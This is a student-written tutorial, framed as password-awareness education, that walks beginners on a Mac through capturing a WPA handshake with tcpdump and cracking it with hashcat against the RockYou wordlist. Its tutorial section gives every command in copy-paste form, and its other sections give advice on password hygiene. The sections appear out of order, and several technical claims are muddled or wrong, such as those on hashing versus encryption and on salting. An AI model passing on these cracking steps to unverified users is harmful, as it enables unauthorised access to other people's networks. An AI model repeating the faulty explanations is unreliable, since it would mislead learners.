The purpose of this tutorial is to provide a user guide that will walk users through the process of hacking WiFi. It is intended for anyone and everyone. You do not need any previous technical experience to understand this guide. We hope this guide will provide users with a better understanding of how to create good passwords.

The next section goes through some background information for the problem we are trying to solve. It gives context for the guide and provides its exigence. If, however, you'd like to go directly to the tutorial section, click here!

If you suspect you are being hacked, it is important to know if your physical device is compromised, or if your online account (such as email) is compromised.

Use different passwords

Different passwords for different services contains the damage from any one hack.

As has been briefly mentioned in this guide, one of the root causes of bad password security is people creating password that they can easily remember. While this is good for ease of use for the user, it is bad for password security. Often, these easy to remember passwords are also easy to crack. However, this ease-of-use blunder extends past creating a single password: It infects all passwords. Another side effect of trying to create passwords that are easy to remember is that users will often use the same password across many if not all of their online accounts [9]. If you have one password that you can remember easily, why not use it everywhere! That's SUPER easy to remember! No need to keep track of 50 different passwords for different sites. Life just becomes simpler. Or at least it does until you get hacked.

If your physical device is compromised, disconnect it from the internet, or unplug your router.

If your physical device is compromised, they are likely controlling it over the internet. Thus disconnect it from the internet to stop it from being remotely controlled. Then the best path forward is to wipe the computer completely using a full reinstall with no data being saved. This wipes any code the hackers could have deployed during the hack. If you are going to restore the computer using a backup, make sure you are restoring it with a backup before the time you suspect you were compromised.

Let's say you, quite unfortunately, fall victim to a successful password hash-cracking attack for a password that you use on one of your accounts. Clearly, that account is now compromised. However, if you use that same password to protect a second account on another website, that second account is compromised as well. If you use the same password for all your accounts, ALL your accounts are compromised. Instead of having to crack 10 or 20 passwords to access all of your digital data, an attacker only has to crack one. This makes their job so much easier and makes your life so much harder.

If your online identity/account is compromised, immediately change your password if possible, and call/contact customer support or fraud.

It is crucial to change your password as soon as you are hacked. This prevents them from changing your email or phone number which is often all that links you to your account. Then sign out of all devices, and then sign back in using the new password. This kicks hackers out of all your other sessions. Then it is important to call customer service or fraud teams for the companies your account was compromised for in order to report it to them, and ask for them to help make sure your account is safe.

If, however, you use different passwords for all your online accounts, a successful attack on one of those passwords does not affect your other accounts [10]. The damage is mitigated and contained, at least for the moment, to that one, compromised account. This makes recovery much easier as well because instead of having to manage locking down all of your accounts and keeping track of all the damage that was done, you only have to focus on one account.

If your email is compromised, this is incredibly dangerous. Until you are certain that you have control over it again, switch all your important accounts over to another email that you know you have control over. This gives you protection and isolation until you are certain you are safe again.

Pay attention to notifications

If you're hacked, you want to know about it, and fast!

While this is all happening, pay attention to all phone notifications, recent history, emails, emails in trash, transaction histories, and more, on all your important accounts. If you notice suspicious activity, take action to secure your accounts. Attacks are often subtle and can spread from account to account.

If the above sounds stressful, it's because it is. It is a much better idea to be preventative in the security space, rather than reactive.

It's important to have these notifications so that you not only know when you are being hacked, but you know as soon as possible. So first off, make sure you have these notifications enable for all your accounts. Not all accounts may have an option to turn these on, and some may not even have these notifications at all, but you should always try and search for the option in your account settings to turn these notifications on.

Often these notifications come in the form of emails and can be for a few different types of events, usually related to login attempts or successful logins. The service on which you have an account will often send you an email if it deems the attempt or successful login to be suspicious. The email should contain details about the login, such as time, date, and location, as well as ways to act against the suspicious login. If the login was from you, then no problem! If it wasn't, then you know you've been hacked.

And for the love of everything, please change your password

We've said it before, but we'll say it again because it's that important: If one of your accounts is unfortunately hacked, CHANGE THE ASSOCIATED PASSWORD. The password often the one way in that the hacker has, so if you close the door and change the lock, the hacker cannot get back in. Just make sure that when you change your password, you make it more complex. (More on that in Good Password Security in the Use complex passwords section.)

Now that you know how to crack a WiFi password, you can start to think about the mechanics of how hacking really works. Hacking is not mysterious bits of information floating down a screen in green text. There are tangible steps taken by real people every day to try and infiltrate and break into your systems.

By knowing the intimate processes that a hacker could take, you will know the tangible actions you can take to put roadblocks in the way of hackers.

In the case of passwords, making a complex password, utilizing special symbols, mixed-case, numbers, and making use of length, reduces the likelihood your password is in a given password list [12]. This makes it infeasible to guess your password within a reasonable time frame.

Moving beyond passwords though, you now also have a better understanding of online security. So much of your information is stored online, and most of it is protected by just a password. That single line of defense between you and any nefarious hackers out there is vital. So please, create strong passwords!

When websites recommend how to use a more complex password, heed their advice. You’ve now seen first-hand how easy it can be to crack a password. Make sure it doesn’t happen to you, and step by step, we move towards a safer online world.

Lastly, online security is an ever-changing world. You should continue to stay up to date in the latest security practices, and even consider using 2-factor-authentication as another tier of security beyond strong passwords [6]. Know that being safe with your passwords is just one piece of the puzzle, one link that hackers can attack. It is up to us as a whole to all be vigilant about our online security practices, and always seek more knowledge to stay up to date about what's going on in the world of computer security.

[1] “Cyber attacks becoming more frequent and severe ,[euro]o survey - Document - Gale OneFile: News,” PanARMENIAN.Net. 21, June, 2011. [Accessed Mar. 07, 2022].

[2] P. Tarwireyi, S. Flowerday, and A. Bayaga, “Information security competence test with regards to password management,” in 2011 Information Security for South Africa, Johannesburg, South Africa, Aug. 2011, pp. 1–7. doi: 10.1109/ISSA.2011.6027524.

[3] G. Delnevo, L. Deluigi, D. Evangelisti, and S. Magnani, “On increasing password security awareness using a serious game,” in 2022 IEEE 19th Annual Consumer Communications Networking Conference (CCNC), Jan. 2022, pp. 82–87. doi: 10.1109/CCNC49033.2022.9700539.

[4] H. S. Venter and J. H. P. Eloff, “Data packet intercepting on the internet: How and why? A closer look at existing data packet-intercepting tools,” Computers & Security, vol. 17, no. 8, pp. 683–692, Jan. 1998, doi: 10.1016/S0167-4048(98)80099-0. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S0167404898800990. [Accessed: Mar. 09, 2022] Venter and Eloff discuss the formation of TCP/IP datagrams that form the basis of segmented communication, and how its architectures lead to attacks that can intercept some or all of the data. Venter and Eloff thus discuss the uses and methodologies of intercepting packets.

[5] C. Ntantogian, S. Malliaros, and C. Xenakis, “Evaluation of password hashing schemes in open source web platforms,” Computers & Security, vol. 84, pp. 206–224, Jul. 2019, doi: 10.1016/j.cose.2019.03.011. [Online]. Available: https://www.sciencedirect.com/science/article/pii/S0167404818308332. [Accessed: Mar. 09, 2022]

[6] D. Nield, “How two-factor authentication keeps your accounts safe,” Wired, 12-Jul-2020. [Online]. Available: https://www.wired.com/story/protect-accounts-two-factor-authentication/#:~:text=When%20you're%20setting%20up,be%20able%20to%20log%20in. [Accessed: 08-Mar-2022]

[7] M. Agarwal, S. Biswas, and S. Nandi, “Detection of De-Authentication DoS Attacks in Wi-Fi Networks: A Machine Learning Approach,” in 2015 IEEE International Conference on Systems, Man, and Cybernetics, Oct. 2015, pp. 246–251, doi: 10.1109/SMC.2015.55. Agarwal, Biswas, and Nandi discuss how the rapid adoption of wireless standards, quickly pushed for encryption of data frames, but did not push for encryption of the authenticate and deauthenticate packets. They discuss the mechanics of attacking this lack of encryption, as well as mitigation strategies.

[8] R. Hranický, L. Zobal, O. Ryšavý, and D. Kolář, “Distributed password cracking with BOINC and Hashcat,” Digital Investigation, vol. 30, pp. 161–172, Sep. 2019. Hranicky, Zobal, Rysavy, and Kolar, study how hashcat can be used to crack passwords in as fast a way as possible by using graphical processing units and a “distributed hashcat” system

[9] T. Bell, “The importance of using different passwords,” ACUTEC, 02-Feb-2022. [Online]. Available: https://www.acutec.co.uk/blog/the-importance-of-using-different-passwords/. [Accessed: 28-Apr-2022].

[10] M. Burgess, “How to know if you've been hacked, and what to do about it,” Wired, 19-Jul-2020. [Online]. Available: https://www.wired.com/story/how-to-know-if-youve-been-hacked-and-what-to-do-about-it/. [Accessed: 28-Apr-2022].

[11] D. Arias, “Adding salt to hashing: A better way to store passwords,” Auth0, 25-Feb-2021. [Online]. Available: https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/. [Accessed: 27-Apr-2022].

[12] P. Navor, “The effects of password length and complexity on password resiliency,” University of Hawaiʻi - West Oʻahu, 01-Nov-2021. [Online]. Available: http://hdl.handle.net/10790/6830. [Accessed: 08-Mar-2022].

Problem Statement

Many people disregard advice when it comes to creating good passwords, and in doing so endanger the security of the plethora of their own personal information stored online. Instead of directly telling people how to create better passwords, which has been tried many times before, we give users a hands-on experience that shows them how easy it is to break passwords, especially those that are subpar. We do this by teaching users how to hack. Specifically, this guide walks users through the process of hacking their own, home WiFi.

Background / History

As humanity’s reliance on electronic media has increased, the threats to our online security have increased as well. While information used to be stored in some sort of physical medium, almost all information today is stored online. Bank accounts, financial records, social media, and health information are all kept in digital databases.

To many, this provides great comfort. An almost infinite amount of information is instantaneously accessible and transferable. On the other hand, this ease of accessibility proves to be a great risk to all involved. Day after day, individuals or groups known as “hackers” try to access digital information that does not belong to them. It could be to expose someone. It could be to gain leverage for manipulation and/or monetary gain. Regardless, the cyber attacks these hackers execute across the world are becoming more and more common [1].

Most of the time, the only obstacle between your private information and your hard-earned money is a simple password. This barricade can be quite effective when used properly, but most of the time, it is not. Many people do not create and use secure passwords [2], instead favoring insecure passwords that are easy to remember. Using these weak passwords leaves their information vulnerable to attack from hackers [3].

Passwords are stored in a hashed (encrypted) form, and if a hacker compromises the hash of an insecure password, they can crack (decrypt) the hash offline, i.e. right on their own laptop without being connected to any sort of network. Once the hash is cracked, the hacker knows the password. Furthermore, people who do create strong passwords may still be at risk - even passwords created according to previous industry standards can be cracked offline in under ten minutes [4][5].

What constitutes a strong password? Is it a combination of numbers and characters, length, or something else? In truth, they all come together to reduce the likelihood that they could be guessed in a brute force or lookup attack [6], the most common ways hackers attempt to crack password hashes. We want to help users understand the risks involved with using insecure passwords so that they may increase their personal password security and create stronger passwords.

We believe giving users a hands-on look into a common type of cyber attack will increase their understanding of online security issues and inspire them to create better passwords. One of the easiest and most accessible interfaces to hack is WiFi. The ever-increasing prevalence of WiFi has led to an increase in the popularity of WiFi attacks [seven]. Password-protected networks can be abused in order to get free WiFi, listen to a victim’s internet traffic, snoop around on an internal network, and much more.

Scope and Constraints

It is important that we lay out the scope of this guide. It does teach you everything about hacking, but it does lay down a great foundation to get started. As a reminder, the scope of this guide is limited to teaching users how to crack the WiFi password of their home WiFi network.

Further, for this guide, we work within the constraints listed below in order to maintain brevity of the guide:

• Another user is already connected to the target network.

• The target network is secured with a relatively weak password within the hash table lookup.

• We choose to only make this guide available to Mac users as that is a common platform.

• We choose to take advantage of already existing tools to automate otherwise lengthy processes.

• This guide is intended only for use on your own, home WiFi network over which you have ownership or on a network for which you have explicit permission from the owner to hack. Only perform the hack demonstrated in this guide on such a network. Do not perform the hack demonstrated in this guide on someone else's network, a public network, or anything else of that nature. We, the creators of this guide, take no responsibility for actions taken by you, the user.

Now that you know how to crack a password, what can you actually do to prevent those types of attacks? What can you do to mitigate the damage done from those types of attacks? We went through some of this in the Conclusion section, but we will go into more detail here.

Use complex passwords

Complex passwords are harder to crack.

The first and most direct way to prevent password hash-cracking attacks is by using complex passwords. Using a password like "123456" will be cracked essentially instantly. Hopefully you've seen through this guide that many passwords can be cracked in a similar time. By increasing the complexity of your password, you make it much more likely an attacker will fail to crack your password. In terms of what we showed in this guide, increasing the complexity of your password makes it more likely your password will not show up on a common passwords text file used to crack password hashes. Some attacks are a bit more complex and either have larger password text files or sequentially go through every password combination up to some sort of length. This latter type of attack is longer, but is more likely to crack your password's hash. Increasing your password length, however, which is part of increasing password security, will make it exponentially more likely that that type of sequential attack will fail. Or, if the attack doesn't fail, it may simply take years to complete.

Longer passwords are stronger passwords.

Okay, so increasing password complexity is good, but what does that actually mean? Well, we've already mentioned one type of increase in complexity: Increase in password length. Again, increasing password length makes it more likely your password will not be included on a common passwords list and more likely that your password will not be cracked in a sequential type of attack. These advantages are the same across all types of actions that increase password security.

Another main way of increasing password security is varying the types of characters used in your password. In addition to the password "123456" being horribly short, it uses only one type of character: Numbers. A more complex password would include not only numbers, but alpha characters and special characters as well. Alpha characters are just letters, and special characters are characters like exclamation point ("!"), the "at" symbol ("@"), and tilde ("~").

Often when people are forced by a website to include special characters, they will simply add an exclamation point at the end of their password. While this does increase the complexity of your password somewhat, it is still fairly common.

Special characters, while combatting the sequential attacks, are even better for combatting the password list attacks. The password lists are often long lists of common passwords, so including special characters, which are not as commonly used, makes your password less common. At least that is the case if the special characters are used correctly.

So how can you overcome this. Simple! Just vary up how you use your special characters. Maybe throw one in in the middle of your password where no one would expect it. Maybe replace a letter by a number for no apparent reason whatsoever. It may make your password harder for you to remember, but it makes the password harder to crack, too. (There are also many applications out there that securely store your passwords. We unfortunately will not go into those in this guide, but feel free to research them on your own!) This is one reason the passwords suggested by your computer, at least on Mac, are unintelligible messes: They're complex!

Use 2-Factor-Authentication

2-Factor-Authentication adds an additional link that hackers must compromise.

2-Factor-Authentication (2FA) is a class of methods to add a second factor, often requiring physical interaction, in order to log in. These can range from texting your phone an additional code, to plugging in a physical often USB key that has a special cryptographic identifier onboard. In the previous cases, the hacker would need to compromise your phone/cell-carrier, or physically steal your key in order to login as well. This makes it orders of magnitude harder to compromise your account. Of course, this all only works if you sign-up or enroll in such services. It is highly recommended that you have 2FA enrolled on all your important identity and banking-related accounts.

Beware social engineering

Some people will try and trick you into giving them your password.

Social engineering may sound fancy, but all it really means is a con. Someone tries to convince you to give them/somehow reveal your password so that they can use it for nefarious purposes. One popular way that hackers often try doing this is by pretending to be from some service on which you have an account. They may email you or call you saying that they need your username and password to fix something wrong with your account. Do not trust this. They are trying to steal your password. It is always best to check this "issues" first on your own. If they truly exist, then you can contact the appropriate people to fix the issue. Otherwise, the issue is fake, and someone just tried to steal your password.

Don't share your password

Even if you trust the person, simply having your password out there is a risk

Related to the social engineering point, sharing your password is also bad. Sometimes this may be necessary, especially for any kind of family account arrangement, so try and limit it as much as possible. Even if you are giving your password to someone whom you trust, giving someone your password creates another access point for hackers to find your password. Maybe that person whom you trust writes your password down somewhere insecure. It's not malicious, but it creates another opportunity for your password to be stolen.

Avoid insecure networks

Public WiFi is available to anyone, including hackers. This makes the networks dangerous.

As we've talked about, there are many WiFi networks out there. You can open up your laptop right now and probably find at least 10-20 networks in range. Some are better than others. "Free" WiFi or "public" WiFi, like the WiFi you would connect to at a Starbucks or an airport, are not great from a security perspective. They often have no password associated with them, so anyone can join. This is fantastic from a practical/service perspective in that anyone who happens to be at the venue can surf the web. This also means, however, that any hacker can join the network and go about malicious activities.

As with sharing your password, sometimes connecting to public WiFi is unavoidable. Sometimes your device may connect automatically! If you must use public WiFi, try your hardest to not transmit sensitive data over the network. This means avoid logging in to any service, which often includes submitting your password and username/email for that service, submitting your credit card information, your address, etc.

Change your passwords

Keeping your passwords dynamic keeps hackers on their toes.

Even if you follow all of the above steps, it is still possible for you to get hacked. An attacker could still somehow find the hash of one of your passwords and begin to crack that hash. Is there anything else we can do?

The answer is, "Yes." Remember that more complex passwords take much longer to crack, sometimes on the order of months to years if the passwords are good enough. Given enough time, however, a hacker will still crack that password. But what if the hacker could never get in the door because the lock kept changing? That is what you do to hackers when you change your passwords every so often. (This could be every few months to every year. It's up to you, but changing your passwords on some frequency is better than not changing them at all.)

Does this take more effort? Yes, it does, especially when you do it correctly, which entails never repeating passwords. (If you repeat a password, it's possible a hacker cracked it the first time around, had the lock changed on them, and was simply waiting for & hoping the lock would be changed back. Congrats! If you repeat a password, you've just granted that hacker their wish.)

In the end, however, it is worth the effort. Getting hacked is no joke, and although it is a pain to deal with, it is possible to mitigate the damage. Go to the next section for more on that!

Let's actually hack some WiFi! The next two sections run through the directions for executing the attack. The first section goes through all the installations you'll need before successfully carrying out the attack. (All the installations we step you through are entirely free. No need to worry about purchasing anything!) The second section guides you through the attack itself.

Additionally, there is a complete video walkthrough of the "Executing the Attack" section. This video walks through every step of a successful attack (other than installing the tools), so feel free to use it for reference! Again, make sure you perform all of the necessary installations before running the commands in the guide and in the video.

IMPORTANT: Any time one of the steps on this page prompts you to enter a password, enter the password used to unlock your computer, and then hit enter (your password will not appear in the terminal as you type so do not worry about that).

All steps should execute instantly unless noted otherwise.

Additionally, make sure that you go through these instructions in order, as commands usually depend on the output of previous commands.

1. Downloading the wordlist

1. Open Terminal.

2. First, we are going to download a wordlist that we will use later on. The wordlist, called RockYou.txt, is a list of 1.4 million common passwords. We will use this list to try and crack the password hash later in the attack. To download and unzip the file, copy and paste this command into Terminal (note: after every command that you copy and paste, be sure to hit enter so that it runs):

wget https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz?raw=true -O rockyou.txt.gz && gunzip rockyou.txt.gz

The output should look similar to this, but not necessarily identical as your environment may look different than ours. It is important to look for a "100%" somewhere in the terminal.

2. Network Recon

Our goal is now to learn the name of the network router. We will do this by using a library called airport. airport will allow us to both determine the network name and mac address.

1. In Terminal, copy and paste this command to allow the airport binary to be recognized:

   sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

2. If prompted, enter your password and hit enter.

3. Determine the name of the WiFi network that you are trying to attack. A list of WiFi names can be found by clicking on the WiFi button in the upper right-hand corner of your home screen. For our example, we will be attacking the “MySpectrumWifi4B-5G” network.

4. Now we will use Mac’s network listening abilities to get some more information about our target network. In Terminal, copy and paste this command:

   sudo airport -s

The output should look something like the figure above. If no networks were found, repeat the previous step.

3. Set Environment Variables

We now need to find the actual name of the network router. The name of the network router is what we need to impersonate the router. All login attempts need to be handled by the router, so when a new person logs into the WiFi their request will be sent to that name. We then want to intercept that encrypted login request that the user sends; this will likely be a encrypted password.

From the output of the previous step, find the BSSID of the target network. It should look like the BSSID outlined in red in the screenshot below:

This BSSID is the Mac Address (the unique identifier) of the WiFi router. We are going to save the BSSID in an environment variable that we will use later. To do this, copy and paste this command:

export BSSID=<TARGET_MAC_ADDRESS>

In our example, we would run:

export BSSID=78:29:ed:27:07:4a

Verification

If the above command worked, you should be able to now run:

echo $BSSID

And see something like the below:

4. More Recon

Now we are going to use airport to disassociate from all networks. This will disconnect you from WiFi, so make sure not to close out of this guide before you are done or you will not be able to access it. To dissociate, run:

sudo airport -z

Next, we will use airport to tell our machine to listen on the channel that our target network is using. First identify the channel from the output of the first step of the previous section Set Environment Variables:

5. Start Listening

Now that we have identified our target network, we will use airport to start eavesdropping on that network. To do this, run:

sudo airport -c<target_channel>

In our example, we would run:

sudo airport -c36

Now we will begin collecting packets. To do this we are going to use tcpdump, a network packet analyzer. We are going to listen for a packet, and then save that packet to a file called beacon.cap. Run:

sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap

This command should complete fairly quickly, as long as there are people using the target network [4]. Look for the packet captured line:

6. Collect Packets

Once the last command is complete, we are going to start listening for any authentication packets. These packets get sent whenever someone re-authenticates to a network. (This happens any time someone goes from being not connected to the WiFi to being connected.) To listen for these packets, run:

sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap

This will not complete immediately, so wait and move on to the next step. When the above command does terminate, it will save the authentication packet in a file called handshake.cap. Within this file will be the hash of the WiFi password that we will try to crack [7].

7. Wait For Reconnection

In order to make the last command terminate, we need to figure out a way to get someone to connect to the network. This is where it gets fun. In a real attack scenario, the attacker would just wait until someone entered the house. When doing this on your own home, you can think of creative scenarios to convince your friends to disconnect and then reconnect to the WiFi. Or, if you want to be boring and you have a device that is connected to the target network, you can just turn the WiFi off on the device, then turn it back on, and wait for the device to reconnect to the target network. When the terminal output changes from Got 0 to another number greater than zero, such as Got 4 in the screenshot below, there have been sufficient packets captured.

Once the terminal says that packets have been captured, you can kill the process by going to your terminal and pressing the control key, often abbreviated to "Ctrl", and the "C" key at the same time.

Note: At this point you are free to reconnect to WiFi.

8. Begin Cracking The Hash

Now we have to merge the two capture files into one file called capture.cap. To do that run:

mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap

We must transfer capture.cap into a format that our cracking tool hashcat can use to crack the password hash. To do this, we have to install one last tool. We will install, compile, and run the tool using this command:

git clone https://github.com/hashcat/hashcat-utils.git && cd hashcat-utils/src && make && cd ../../ && hashcat-utils/src/cap2hccapx.bin capture.cap capture.hccapx

There will be a lot of text printed to the terminal, but the last few lines should look like this:

Note that if you already had a hashcat-utils folder in the working directory, this step may not work. in that case, run the previous command starting from the "cd hashcat-utils..." section.

9. Cracking The Hash

Make sure that there was at least one WPA Handshake written to capture.hccapx as is shown in the screenshot above. If there was not, then go back to the sudo tcpdump step of Start Listening and try again. If this still does not work, cascade up the tutorial and confirm your ability to successfully complete and confirm the outputs of Wait for Reconnection and Collect Packets. If the problem persists, it may be that your WiFi authentication scheme is not vulnerable to this attack.

Once we have the hash file, we are going to try and crack it using hashcat. A hash is just an encrypted password. We are going to go through the entire list of 1.4 million passwords that we downloaded earlier, encrypt them, and then see if they match the hash that we captured. If they match, then we have cracked the WiFi password [8]! To begin this process, run:

hashcat -m 2500 capture.hccapx rockyou.txt

This process could take up to five minutes (remember, it is trying 1.4 Million passwords). If successful, the result will look like this:

Now all that is left to do is to retrieve the password! Finally, run:

hashcat -m 2500 capture.hccapx rockyou.txt --show

You should now have the decrypted password, as shown in the screenshot above.

Technical Conclusion

On my network, the password was rewardbarrel058 (don’t worry, I changed it immediately after this example).

If the password attack was not successful, congratulations! You at least have a decently secure password. Keep in mind, however,mthat we only used 1.4 Million passwords. A dedicated cracking rig could run through over a billion attempts in a very short amount of time.

You can also add your password to the wordlist and re-run the last few steps to see what it would be like if the steps did work. To do that, run echo <your_password> >> rockyou.txt where <your_password> is the password of your target network. This command adds your password to the end of the rockyou.txt file, thus adding the password to the wordlist. For example, if rewardbarrel058 was not on rockyou.txt, we would add it by running:

echo rewardbarrel058 >> rockyou.txt

Now go back and follow the tutorial from Cracking The Hash, and the password hash should get cracked!

Opening up Terminal

Terminal is a Command Line System that allows you to tell your operating system to execute certain commands. Basically, it is a way for you to talk to your Mac. We are going to use Terminal during this entire attack. If that scares you, don’t be worried. We will walk you through every step! Your grandmother would be able to follow this guide, so stick with us! To open up Terminal:

1. Open the "Finder" application in the bottom left-hand corner of your Mac’s home screen.

2. Open the "Applications" folder.

3. Open the "Utilities" folder by clicking on the dropdown arrow.

4. Double click on the "Terminal" application.

Installing Tools

There are four tools we need to install that will be used in our WiFi attack. The first tool, Xcode, will be installed through the App Store, but the rest of the tools will be installed using Terminal.

IMPORTANT: Any time one of these steps prompts for a password, enter the password used to unlock your computer, and then hit enter. (Your password will not appear in text as you type so do not worry about that.)

Xcode Install

The first tool we need to install is Xcode. Xcode has software development tools that we will need to install our next tool.

If you already have Xcode installed, skip below to the HomeBrew Install section.

To install Xcode:

1. Navigate to the “Applications” folder as described in the Opening up Terminal section.

2. Double click on the “App Store” icon to open the Apple App Store.

4. If you have not already installed Xcode, there will be a “Get” button next to the app icon. Click on this button and follow the prompts to install.

Installation Time: Depending on previous installations, Xcode could take over an hour to install. Thankfully, many people will already have Xcode installed on their Mac.

HomeBrew Install

The second tool we need to install is HomeBrew. HomeBrew is a package manager (basically a tool to install other tools) for Mac that will allow you to install the last tool that we need.

If you already have HomeBrew installed, skip below to the HashCat Install section.

To install HomeBrew:

1. Open Terminal as described in the Opening up Terminal section.

2. Copy and paste this command into Terminal: ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

3. Press enter to execute the command.

Installation Time: Five to twenty minutes.

HashCat Install

The last tool we need to install is HashCat. HashCat is a password cracking tool that we will use to crack the “password hash” that we will recover (more on that later).

If you already have HashCat installed, you can click on the next page to begin Executing the Attack!

We will install HashCat using HomeBrew from Terminal.

1. Open Terminal as described in the “Opening up Terminal” section.

2. Copy and paste this command into Terminal: brew install hashcat

3. Press enter to execute the command.

Installation Time: Two to ten minutes.

Luca Koval

I'm honestly not sure how I first got into hacking and computer security. I just remember that at some point in grade school (I think), I started looking up tutorials online for how to hack. The topics of the tutorials were all over the place, but all of it was thrilling for me to learn about. Unfortunately, many of the tutorials weren't communicated in the best manner. Looking back, it would have been really nice to have a well-organized, thoughtful, and correct tutorial for hacking. I hope we've accomplished that with this guide!

Email: LinkedIn:

Henry Samuelson

For as long as I have been interested in computers I have been interested in breaking them. I am a Computer Science major with a focus on Computer Security; a topic intimately intertwined with hacking.

This summer I will be starting at Microsoft as a Software Engineer, where I will be focusing on building security tools to detect vulnerabilities in internal code bases. These past two summers I had the privilege of interning at Microsoft where I learned how to write code to detect vulnerabilities.

In addition to Computer Security, I am an avid music player and love composing music.

John Stawinski

Three years ago, one semester after I had taken my first ever CS course, I applied to an internship in offensive cybersecurity. Having zero knowledge of what that actually was, I quickly bombed the practical interview (and did not receive the internship). However, I thought that the stuff I was supposed to know how to do was pretty cool. So I spent the last few years learning offensive cybersecurity practices, spending two summers working as a penetration tester. Next year I will work full-time for the company that I initially got rejected by. It has been a fun journey and I am excited to continue my learning! In addition to hacking, I grew up in Vermont and enjoy any outdoor/adventure activity (skiing, surfing, mountain biking, hiking, etc.).

Email: jstan327@gmail.com

LinkedIn:

Shihao Cao

Ever since school computers started to roll out with restricted privileges, I was always wondering how to get around them.

Obviously for practical purposes, things like task manager would not be accessible to the student user account, which meant when things inevitably froze with no ability for me to do anything.

This drove me down the rabbit hole of hacking, and as a result I learned so much more about how to keep my own account secure.

Now, I use lengthy unique passwords everywhere, and even carry a 2FA key on my keychain.

While what we have shown here is specific to cracking WiFi passwords, a lot of the base techniques are the same across many different types of attacks. Pretty much any hash-cracking attack will use the principles taught here in this guide. What changes is how the hashes are obtained. Many password, credit card, and other sensitive information leaks that you hear about in the news end the same way: Hash cracking. If you’re interested in these other types of attacks, we encourage you to learn more! We unfortunately do not cover those types of attacks in this guide.

Does this work for Windows or Linux?

No, this guide is for Mac only.

Should I be trying this on my neighbor’s WiFi?

NO. You may only try this on a WiFi network that you own / have explicit permission to experiment on, such as your home WiFi network. Any unauthorized attempts at breaking into a private network are illegal. We take no responsibility for such actions.

Does this method work with salted password hashes?

First, what is a salted password hash? A salted hash is just like a hash we have previously learned about in this tutorial, except that before hashing the password, a random string is appended to the password. Salting is an effective security method for protecting stored password hashes as it makes each hash harder to crack. Specifically, the attacker needs to be able to guess the length of the password plus the random hash to crack the salted hash. A server may employ salting to protect stored hashes, but a hash that is being sent over a network cannot have a salt. (This means, for example, that WiFi passwords cannot be hashed.) This is because there is no way to securely convey what the salt is across the network. If a computer is requesting access via a hashed password, there is no way for that computer to understand the authentication server's salt. Hence all password hashes sent for authorization must not be salted. In conclusion, yes this tutorial should work even in a system where passwords are salted, but that is not a concern of this guide as WiFi password hashes are not salted [11].